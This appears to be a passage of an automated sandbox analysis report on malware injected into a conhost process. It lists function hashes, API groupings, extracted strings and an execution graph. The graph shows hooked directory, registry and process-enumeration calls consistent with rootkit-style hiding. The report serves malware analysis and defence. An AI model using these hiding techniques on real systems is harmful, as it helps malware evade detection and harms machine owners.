                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                • Instruction Fuzzy Hash: 0B31B871B01B5A82EB12DF1EA84C3AD63EAFF65788F0941249F4827755EF38C469C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                • String ID:
                                                                • API String ID: 517849248-0
                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                • Instruction ID: 21ee20bd7bba2419659003283d26d6569110537a10081f05a0d9b96fa4f38b89
                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                • Instruction Fuzzy Hash: 83018071700A4596EB14DB1AA45C7AD63AAFF99FD4F888035CE8993754DE3CC989C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                • String ID:
                                                                • API String ID: 449555515-0
                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                • Instruction ID: 19eb1356534c53b4bd857940877bc3f5f303013cbd76ed6dcd2fa016f91c1f8e
                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                • Instruction Fuzzy Hash: 48111E75611B4882EB259B2DF40D79E67AABF69B45F040428CE5917758EF3DC44CC700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 2395640692-629598281
                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction ID: 55a0897108b236b4142cd5e2fa4fa6a237eb95147fa31d82c5cfe20d8f1cec7a
                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction Fuzzy Hash: 9D518C322116088BEB16DF99E44CB9D37DAFF65BACF5181249A1767788EF35CA41C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 2395640692-629598281
                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction ID: 09274eb5e08f4ce639a874ed4212bd94cab34e20f223f5bf3160672a4024af9d
                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction Fuzzy Hash: D231DF3221074896E711DF59E84CB9D37EAFF64B8CF068214AE5A23789EF38CA41C704
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: FinalHandleNamePathlstrlen
                                                                • String ID: \\?\
                                                                • API String ID: 2719912262-4282027825
                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                • Instruction ID: ddd203aa3278862c0ebd2c363a2c863cac05b359dbcce9c9bc6162202a150504
                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                • Instruction Fuzzy Hash: A1F04F7230464996EB208B29F49C39D6766FF65B98F889035CA895B964DE6CC68CCB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CombinePath
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3422762182-91387939
                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                • Instruction ID: b893f7a5a509687ac80f012847dcbc655c984c15457ee0bf334dc15f21860c3a
                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                • Instruction Fuzzy Hash: C9F08230704B8892EA048B1FB90C1AD666AEF69FD4F088131DE9B27B28CE2CC4498700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                • Instruction ID: 291add23297734f9f95c2a838170ad2deecd5c8d3030a7309573882a91c465f9
                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                • Instruction Fuzzy Hash: D6F08971311B4891EF554F6CE88C3EC276AAF64784F081019991B67575CF28C48CC700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                • Instruction ID: 0c9944cd4afd0e1babb47705740017b9cc5aa69177f349cad403aef28f4a098e
                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                • Instruction Fuzzy Hash: 4902FC72119B8886EB61CB59E49839EB7E5FBD5B84F100115EA8E97BA8DF7CC444CF00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 2210144848-0
                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                • Instruction ID: 77e512e6cac4fc820cad2a44d1659ccf7b3aef37ee26126f8b606649615c7c64
                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                • Instruction Fuzzy Hash: A181ED32610A5C89FB55AF6DD88C3ED26ABFF66B88F444116DE0AB3796DB348442D310
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                • Instruction ID: 966642a413e11f6af2beafc7c7881486eafbc4ea536d1687314809de73cfbc69
                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                • Instruction Fuzzy Hash: 5F61D876519B48C7EB659B19E44C35EB7EAFB98B48F100116EA8D57BA8CB7CC540CF00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2281866973.00000216AAA70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216AAA70000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216aaa70000_conhost.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction ID: a55c73e9fa6c2ce9d73a3e652ea667440523fb524b9920c8d2b368095f16fd3e
                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction Fuzzy Hash: 6B118E32A54EC102F6E52169E57E3ED11C1FF7C774F484637AF7636BDA8A2A8C424280
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction ID: bfe24d190eea9661ec4158eb80eb7db9ec649420577475063e1cc590f779fc20
                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction Fuzzy Hash: 7E11A532A54A8901FEA8116EE49E3ED105B7FB7374F088724BA76373D79B5C8C428240
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                • String ID:
                                                                • API String ID: 1092925422-0
                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                • Instruction ID: 8ea094786f3ac28259268a20b19bfcb36084a903635a233a8ac438526efeebb9
                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                • Instruction Fuzzy Hash: 8311273A704B4482FB159B29F40C3AE66BAFF99B88F480029DF8917794EE3DC548C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2281866973.00000216AAA70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216AAA70000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216aaa70000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 3242871069-629598281
                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction ID: 2ee23744f7270abb8376b866a494e196e0e2656761486dd32a0411b3a4e9c21a
                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction Fuzzy Hash: A151D0323122009ADB14DF25E86CBAE77D5FB68B98F518126DF16A378CDB36C881C705
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2281866973.00000216AAA70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216AAA70000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216aaa70000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 3242871069-629598281
                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction ID: 3ff26e229a821504252725082309d42ff312762ad9513c50654e2f0e9739a56f
                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction Fuzzy Hash: 5631A27121164096E714DF11E86CBAE37E4FB68BD8F15801AAF5BA7748CB3AC981C705
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Free
                                                                • String ID:
                                                                • API String ID: 3168794593-0
                                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                • Instruction ID: 3d0cb2fc21488675456f6849de0f3e90dee1d49216e4b2967c5b47bb9285c2e6
                                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                • Instruction Fuzzy Hash: DF117972914B9896EB50CFAEA80C29E73A6FF9AB84F08401DDF8A23714DF3CC0158700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                • Instruction ID: 4cdbedf93b6e72eecc1b763d6621c0773316247db54b93c53d5243cc9ee8d7a9
                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                • Instruction Fuzzy Hash: BA71C43220478946EBA69F2D994C3EEA7DAFF65B88F444016DE4963B88DE35CD44C780
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                • Instruction ID: f3a4477327eae42f4160d00dd7950f67a75d4f350008c91b8f1438824f8cdb69
                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                • Instruction Fuzzy Hash: 5F51E13221478941E6B79F2D955C3ED66EBFFA5788F054015ED4513B9ACE35CC058B80
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                • Instruction ID: f8fe16143506ed6ee12789b18f9e15235ad8531722b7cb893e05aeeb94a017fc
                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                • Instruction Fuzzy Hash: 9C41B572315A4882EB209F29E44C3DE77A6FFA9784F444025EE8D97798DB3CC541CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Stringtry_get_function
                                                                • String ID: LCMapStringEx
                                                                • API String ID: 2588686239-3893581201
                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                • Instruction ID: 0a795e89422814df0053fcc861901a9b47ddda434412a08a4b369260fd6129e5
                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                • Instruction Fuzzy Hash: 0A114D36608B8486D760CB59F84839EB7A5FBD9BC4F54412AEE8D53B19DF38C454CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                • Instruction ID: 1d4374e9f4da2fbd7a364187111027bf5cc04f493b928ab6b63e078339675821
                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                • Instruction Fuzzy Hash: A8110D32214B8482EB618B19E44839D77E5FF98B98F184221DE8D17B65EF39C555CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                • String ID: InitializeCriticalSectionEx
                                                                • API String ID: 539475747-3084827643
                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                • Instruction ID: 170e7a292dd03f5192a0dcd1811eaeade1e40729cd41b12708d6730998e7bd93
                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                • Instruction Fuzzy Hash: 6CF0E23171078892E7159B8DF40C6DC277AAF98B84F485125AE4927B14CE38C898C750
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2281866973.00000216AAA70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216AAA70000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216aaa70000_conhost.jbxd
                                                                Similarity
                                                                • API ID: try_get_function
                                                                • String ID: November$October
                                                                • API String ID: 2742660187-1636048786
                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                • Instruction ID: f9c337cce78e9797e2c21d4d0fe2a269e7604ba5253d9560db1fcf151f010a1a
                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                • Instruction Fuzzy Hash: 26E0927120058192FB169B62F46C6EE62E19FB8740F596023AF292625ACF3AC8868340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Valuetry_get_function
                                                                • String ID: FlsSetValue
                                                                • API String ID: 738293619-3750699315
                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                • Instruction ID: 053b1d0efd06a5d8159bc87454e9169ee8eeebda0727b3a74bb66022f22d15c9
                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                • Instruction Fuzzy Hash: 7CE0927130564892EB164B9CF80C7EC236BBFE9784F5C4126E9092B355CE38C859C710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID:
                                                                • API String ID: 756756679-0
                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                • Instruction ID: dfc672f108d8f45512eb83d812de810d4a61c01d004c26b27f0f4b44db352af5
                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                • Instruction Fuzzy Hash: 5B217132605B9485EF128F5DA40C2DEB3E5FF99BA8F094114DE8C57B15EB78D5468700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                • Instruction ID: 1a72857e07bb02738ddd9c9fd40567e4250ca26abc02a7f87285374e26e285e6
                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                • Instruction Fuzzy Hash: DFE0EDB1A1260486E7049F6AD81C39D76E6FF9AF51F4EC028CD4907350DF7D9499C750

                                                                Execution Graph

                                                                Execution Coverage:6.9%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:54.4%
                                                                Total number of Nodes:103
                                                                Total number of Limit Nodes:20
                                                                execution_graph 21646 1aff2a7c NtEnumerateValueKey 21647 1aff2ac7 21646->21647 21648 1aff2b20 21646->21648 21647->21648 21649 1aff2ad4 NtEnumerateValueKey 21647->21649 21651 1aff3930 21647->21651 21649->21647 21652 1aff393d StrCmpNIW 21651->21652 21653 1aff3952 21651->21653 21652->21653 21653->21647 21720 1aff24dc NtQueryDirectoryFile 21721 1aff2564 _invalid_parameter_noinfo 21720->21721 21729 1aff269d 21720->21729 21722 1aff25c0 GetFileType 21721->21722 21721->21729 21723 1aff25ce StrCpyW 21722->21723 21724 1aff25e2 21722->21724 21727 1aff25ef 21723->21727 21725 1aff1ab8 4 API calls 21724->21725 21725->21727 21726 1aff3930 StrCmpNIW 21726->21727 21727->21726 21727->21729 21731 1aff3200 StrCmpIW StrCpyW StrCatW PathCombineW 21727->21731 21732 1aff1e4c StrCmpIW StrCmpW 21727->21732 21731->21727 21732->21727 21733 1aff2cdc NtDeviceIoControlFile 21734 1aff2d5b 21733->21734 21735 1aff3090 21733->21735 21734->21735 21736 1aff2d79 GetModuleHandleA 21734->21736 21737 1aff2d9d 21736->21737 21738 1aff2d8b GetProcAddress 21736->21738 21737->21735 21739 1aff2dc4 StrCmpNIW 21737->21739 21738->21737 21739->21735 21743 1aff2de9 21739->21743 21740 1aff1a14 6 API calls 21740->21743 21741 1aff2efb lstrlenW 21741->21743 21742 1aff2fb5 lstrlenW 21742->21743 21743->21735 21743->21740 21743->21741 21743->21742 21744 1aff3930 StrCmpNIW 21743->21744 21745 1aff1554 StrCmpIW StrCmpW 21743->21745 21744->21743 21745->21743 21746 1aff21cc NtQuerySystemInformation 21747 1aff2208 21746->21747 21748 1aff22e8 21747->21748 21749 1aff231d 21747->21749 21755 1aff2221 21747->21755 21750 1aff2322 21749->21750 21751 1aff2391 21749->21751 21758 1aff30b4 11 API calls 21750->21758 21751->21748 21759 1aff30b4 11 API calls 21751->21759 21753 1aff2263 StrCmpNIW 21753->21755 21755->21748 21755->21753 21757 1aff1d60 6 API calls 21755->21757 21757->21755 21758->21748 21759->21748 21771 1afc2908 21772 1afc2936 21771->21772 21773 1afc2994 VirtualAlloc 21772->21773 21774 1afc29b8 21772->21774 21773->21774 21765 1aff3b99 21768 1aff3ae6 _invalid_parameter_noinfo 21765->21768 21766 1aff3b50 21767 1aff3b36 VirtualQuery 21767->21766 21767->21768 21768->21766 21768->21767 21769 1aff3b6a VirtualAlloc 21768->21769 21769->21766 21770 1aff3b9b GetLastError 21769->21770 21770->21766 21770->21768 21691 1affa568 21692 1affa57d 21691->21692 21693 1affa581 21691->21693 21703 1affcc38 32 API calls 21693->21703 21695 1affa586 21704 1affd130 GetEnvironmentStringsW 21695->21704 21698 1affa593 21718 1affb8d8 10 API calls _set_errno_from_matherr 21698->21718 21700 1affa5a0 21717 1affb8d8 10 API calls _set_errno_from_matherr 21700->21717 21703->21695 21705 1affd15e 21704->21705 21715 1affd200 21704->21715 21705->21705 21719 1affd080 WideCharToMultiByte 21705->21719 21706 1affd20a FreeEnvironmentStringsW 21707 1affa58b 21706->21707 21707->21698 21716 1affa5d4 20 API calls 4 library calls 21707->21716 21715->21706 21715->21707 21716->21700 21717->21698 21718->21692 21760 1aff29b4 NtEnumerateKey 21761 1aff2a5c 21760->21761 21764 1aff29ff 21760->21764 21762 1aff2a10 NtEnumerateKey 21762->21764 21763 1aff3930 StrCmpNIW 21763->21764 21764->21761 21764->21762 21764->21763 21654 1aff23f0 GetProcessIdOfThread GetCurrentProcessId 21655 1aff24be NtResumeThread 21654->21655 21656 1aff2421 21654->21656 21661 1aff19ac OpenProcess 21656->21661 21659 1aff2433 CreateFileW 21659->21655 21660 1aff2477 WriteFile ReadFile CloseHandle 21659->21660 21660->21655 21662 1aff19d8 IsWow64Process 21661->21662 21663 1aff1a01 21661->21663 21664 1aff19ea 21662->21664 21665 1aff19f8 CloseHandle 21662->21665 21663->21655 21663->21659 21664->21665 21665->21663 21666 1aff26f0 NtQueryDirectoryFileEx 21667 1aff2961 21666->21667 21668 1aff277a _invalid_parameter_noinfo 21666->21668 21668->21667 21669 1aff27d1 GetFileType 21668->21669 21670 1aff27df StrCpyW 21669->21670 21671 1aff27f5 21669->21671 21672 1aff2804 21670->21672 21682 1aff1ab8 GetFinalPathNameByHandleW 21671->21682 21676 1aff280e 21672->21676 21679 1aff28b3 21672->21679 21674 1aff3930 StrCmpNIW 21674->21676 21675 1aff3930 StrCmpNIW 21675->21679 21676->21667 21676->21674 21687 1aff3200 StrCmpIW StrCpyW StrCatW PathCombineW 21676->21687 21688 1aff1e4c StrCmpIW StrCmpW 21676->21688 21679->21667 21679->21675 21689 1aff3200 StrCmpIW StrCpyW StrCatW PathCombineW 21679->21689 21690 1aff1e4c StrCmpIW StrCmpW 21679->21690 21683 1aff1ae2 StrCmpNIW 21682->21683 21684 1aff1b21 21682->21684 21683->21684 21685 1aff1afc lstrlenW 21683->21685 21684->21672 21685->21684 21686 1aff1b0e StrCpyW 21685->21686 21686->21684 21687->21676 21688->21676 21689->21679 21690->21679

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
